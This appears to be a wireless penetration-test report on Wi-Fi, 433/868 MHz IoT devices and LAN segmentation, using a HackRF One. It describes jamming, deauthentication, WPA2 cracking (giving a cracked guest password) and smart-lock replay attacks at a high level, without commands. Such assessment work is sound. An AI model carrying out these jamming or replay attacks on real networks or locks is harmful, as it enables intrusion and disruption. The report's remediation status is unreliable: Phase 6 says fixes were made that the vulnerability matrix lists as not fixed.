HackRF Wi-Fi & RF Audit

📻 Wi-Fi & RF Security Audit Report (HackRF One Integration) #

Subject: Security Audit of Wi-Fi and Network Infrastructure
Date of Test: 1 June 2024 – 10 June 2024
Location: Bristol, United Kingdom
Company Conducting the Test: CyberSentinel Solutions LTD
Version: 1.0

📑 Executive Summary #

This report presents the results of a comprehensive security audit of the Wi-Fi and network infrastructure conducted by CyberSentinel Solutions LTD in June 2024, utilizing advanced Software-Defined Radio (SDR) tools, specifically the HackRF One.

This audit focused on identifying vulnerabilities within Wi-Fi communications, wireless devices, and network components by exploiting weaknesses across a wide range of radio frequencies. The HackRF One played a critical role in detecting RF leakage, intercepting proprietary IoT wireless communication, simulating jamming attacks, and testing signal security.

Scope of the Audit:

  • [01] Wi-Fi Networks (2.4 GHz and 5 GHz bands)
  • [02] Wireless IoT Devices (Proprietary Sub-GHz RF protocols)
  • [03] Local Area Network (LAN) & Network Segmentation
  • [04] RF Signal Security & Emanation

🎯 Test Objective #

The key objectives of the Wi-Fi and RF network audit were to:

  1. Evaluate the security of Wi-Fi encryption (WPA2/WPA3) and test for potential password cracking or interception.
  2. Investigate vulnerabilities in wireless IoT devices and proprietary RF protocols (e.g., 433 MHz / 868 MHz) used within the environment.
  3. Simulate jamming and signal interference attacks to assess the network’s resilience.
  4. Test for leakage of sensitive information through unencrypted RF communications.
  5. Validate the effectiveness of network segmentation and access control.

🛠️ Test Methodology & Tactical Toolkit #

The assessment combined traditional network penetration testing methodologies with advanced Software-Defined Radio (SDR) techniques.

~~yaml

Tactical Toolkit [SDR & RF Exploitation] #

equipment:

  • hardware: “HackRF One (SDR)” use: “RF signal analysis (1 MHz to 6 GHz), eavesdropping on wireless protocols, and performing jamming/signal injection attacks.”
  • software: “GNURadio (v3.10)” use: “Demodulating wireless signals, inspecting proprietary communication protocols, and processing raw RF data.”
  • software: “Aircrack-ng Suite (v1.7)” use: “Capturing Wi-Fi handshakes and performing offline WPA2 dictionary attacks.”
  • software: “Wireshark (v4.0)” use: “Network protocol analyzer used to capture and inspect decrypted wireless traffic.”
  • hardware: “Kali Linux (v2024.1)” use: “Primary penetration testing OS running Bettercap, nmap, and Metasploit.”
  • hardware: “Alfa AWUS036ACH Wi-Fi Adapter” use: “High-powered adapter for monitor mode, frame injection, and WPA2/WPA3 handshake capturing.”
  • software: “Bettercap (v2.33.2)” use: “MitM attacks, ARP spoofing, and traffic interception.” ~~

🔬 Phases of the Security Assessment #

Phase 1: Wi-Fi Reconnaissance and RF Signal Capture #

  • Date: 1 June 2024 – 2 June 2024
  • Objective: Discover Wi-Fi networks and analyze radio frequency traffic for vulnerabilities.
  • Procedure: HackRF One and GNURadio were used to scan the 2.4/5 GHz bands and Sub-GHz IoT bands.
  • Outcome: Detected Corporate_WiFi (WPA3) and Guest_WiFi (WPA2-PSK). Identified multiple proprietary IoT devices on the 433 MHz and 868 MHz bands. Critical: RF leakage detected on the 433 MHz band, where sensitive environmental sensor data was transmitted entirely unencrypted.

Phase 2: RF Jamming and Wi-Fi Signal Interference #

  • Date: 3 June 2024
  • Objective: Simulate Wi-Fi jamming to evaluate network resilience.
  • 1. Wi-Fi Signal Jamming: Outcome: HackRF One broadcasted continuous broadband noise on 2.4 GHz and 5 GHz. The Guest_WiFi suffered a complete Denial of Service (DoS). The Corporate_WiFi (5 GHz) experienced intermittent disruptions.
  • 2. Deauthentication Attack: Outcome: Targeted deauth frames forced clients off the Guest_WiFi, allowing the successful capture of the WPA2 4-way handshake for offline cracking.

Phase 3: WPA2/WPA3 Handshake Capture and Password Cracking #

  • Date: 4 June 2024 – 5 June 2024
  • Objective: Crack captured handshakes using offline brute-force/dictionary techniques.
  • 1. WPA2-PSK Password Cracking: Outcome: The Guest_WiFi password (“guest2024”) was successfully cracked within hours using a dictionary attack, demonstrating poor password hygiene.
  • 2. WPA3-Enterprise Security Assessment: Outcome: Handshakes were captured, but cracking attempts failed. WPA3’s Simultaneous Authentication of Equals (SAE) mechanism successfully neutralized brute-force attempts.

Phase 4: RF Signal Interception and Eavesdropping on IoT #

  • Date: 6 June 2024
  • Objective: Intercept and exploit proprietary RF signals (433 MHz / 868 MHz).
  • 1. Eavesdropping (433 MHz): Outcome: HackRF One and GNURadio easily decoded unencrypted transmissions from smart sensors, exposing sensitive environmental and operational data.
  • 2. IoT Replay Attack: Outcome: CRITICAL. RF control signals for smart locks and sensors were captured and replayed using the HackRF One. The devices accepted the replayed transmissions without challenge-response validation, allowing unauthorized physical control over the locks.

Phase 5: Network Segmentation and Vulnerability Scanning #

  • Date: 7 June 2024
  • Objective: Test LAN segmentation and scan for exposed internal services.
  • Procedure: Attempted lateral movement from Guest_WiFi and executed service scans via nmap and Metasploit.
  • Outcome: Guest-to-Corporate segmentation was functional. However, a misconfigured IoT device on the corporate network was reachable from the guest segment. Vulnerability scans revealed an outdated printer susceptible to Remote Code Execution (RCE) and a legacy file server running the highly vulnerable SMBv1 protocol.

Phase 6: Post-Exploitation Analysis and Cleanup #

  • Date: 9 June 2024 – 10 June 2024
  • Outcome: Unencrypted IoT devices were reconfigured where possible. The segmentation bypass was patched. Printer firmware was flagged for immediate updates, and SMBv1 was disabled on the file server to prevent EternalBlue exploitation.

📊 Vulnerability Overview Matrix #

VulnerabilitySeverityStatusNotes
Weak Guest Wi-Fi PasswordCRITICAL❌ Not FixedEasily cracked using dictionary attack (“guest2024”).
Unencrypted IoT RF Signals (433 MHz)HIGH❌ Not FixedSensitive data transmitted in plaintext over RF.
Replay Attacks on IoT DevicesHIGH❌ Not FixedSmart locks accept replayed commands, allowing unauthorized physical access.
Outdated Printer Firmware (RCE)HIGH❌ Not FixedPrinter exploited for remote code execution.
SMBv1 Enabled on File ServerHIGH❌ Not FixedVulnerable to EternalBlue exploit.
Segmentation Weakness for IoTMEDIUM❌ Not FixedGuest network allowed routing access to corporate IoT devices.

🛡️ Strategic Recommendations #

  1. Strengthen Wi-Fi Password Policies: Enforce WPA3 encryption for all networks where hardware permits. For legacy WPA2 networks, implement a complex, 16+ character passphrase that is rotated periodically.
  2. Mitigate IoT Replay Attacks: Replace legacy 433 MHz smart locks with devices that implement strict cryptographic challenge-response authentication or rolling codes to invalidate replayed signals.
  3. Encrypt IoT Communications: Ensure all deployed IoT sensors utilize AES-128 or stronger encryption for data transmitted over proprietary Sub-GHz RF protocols.
  4. Improve Network Segmentation: Place all IoT devices (printers, smart locks, sensors) into a strictly isolated VLAN with no inbound routing permitted from the Guest network.
  5. Disable SMBv1: Immediately disable the deprecated SMBv1 protocol across all file servers and workstations to neutralize the risk of ransomware propagation (e.g., WannaCry/EternalBlue).
  6. Patch Management: Update firmware on all network printers and infrastructure devices to remediate known RCE vulnerabilities.

~~bash

AUTHORIZATION AND SIGN-OFF #

Prepared by: [+] Dr. James Anderson | Lead Security Analyst [+] Emily Walker | Senior Network Security Engineer Entity: CyberSentinel Solutions LTD Date: June 2024 ~~